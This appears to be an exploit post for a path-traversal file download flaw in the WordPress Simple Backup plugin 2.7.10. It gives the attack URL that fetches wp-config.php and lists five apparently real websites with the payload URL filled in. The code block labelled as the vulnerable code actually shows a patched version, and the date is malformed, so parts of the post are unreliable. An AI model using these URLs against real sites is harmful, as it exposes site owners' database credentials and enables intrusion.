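######################
# Exploit Title : Wordpress Simple Backup Plugin Arbitrary Download File Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# discovered by : Mahdi.Hidden
# Vendor Homepage : http://mywebsiteadvisor.com/
# Date: 2015-13-05
# Tested On : Windows - Linux
# Software Link : https://downloads.wordpress.org/plugin/simple-backup.2.7.10.zip
# Version : 2.7.10 (Last Version)
######################
# Exploit :
# [Site]/[Path]/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
# Vulnerable Code (2.7.10), shown here with the missing path-containment check
# added. As shipped, $_GET['download_backup_file'] was concatenated onto the
# backup directory and handed to readfile() unchecked, so "../wp-config.php"
# resolved one level above the backup directory and was streamed to the client.
#
if (array_key_exists('download_backup_file', $_GET)) {
    // NOTE(review): no capability or nonce check is visible in this excerpt;
    // confirm the caller enforces current_user_can() before this branch runs.
    $this->download_local_backup_file($_GET['download_backup_file']);
}

/**
 * Stream one backup file from ABSPATH/simple-backup to the client, then exit.
 *
 * @param string $filename File name taken from the request. Only its base name
 *                         is used; a value that does not resolve to a regular
 *                         file inside the backup directory is answered with 404.
 */
private function download_local_backup_file($filename)
{
    $bk_dir = ABSPATH . "simple-backup";

    // Traversal fix: strip any directory component, resolve both sides with
    // realpath() (collapses "../" and symlinks) and require the file to sit
    // under $bk_dir. "../wp-config.php" becomes "wp-config.php", which does not
    // exist in the backup directory, so the request is refused.
    $filename = basename((string) $filename);
    $base     = realpath($bk_dir);
    $file     = ($filename === '' || $base === false) ? false : realpath("$bk_dir/$filename");
    if ($file === false || !is_file($file)
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        die();
    }

    clearstatcache();
    $size = filesize($file);
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    // Quote the name so spaces or ';' in a backup file name cannot alter the header.
    header('Content-Disposition: attachment; filename="' . str_replace('"', '', $filename) . '"');
    header("Content-Length: $size");
    header('Connection: close');
    ob_end_clean();
    flush();
    readfile($file);
    die();
}
#
#
######################
# Examples:
#
# https://daptonerecords.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
# http://mywebsiteadvisor.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
# http://3degreesdigital.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
# http://travellingdijuca.com/WordPress/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
# http://justinthedesigner.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
#
######################
# Special thanks to:
# ACC3SS - Milad Hacking - T3rm!nat0r5 and all of Ashiyane Exploiters and Defacers.
######################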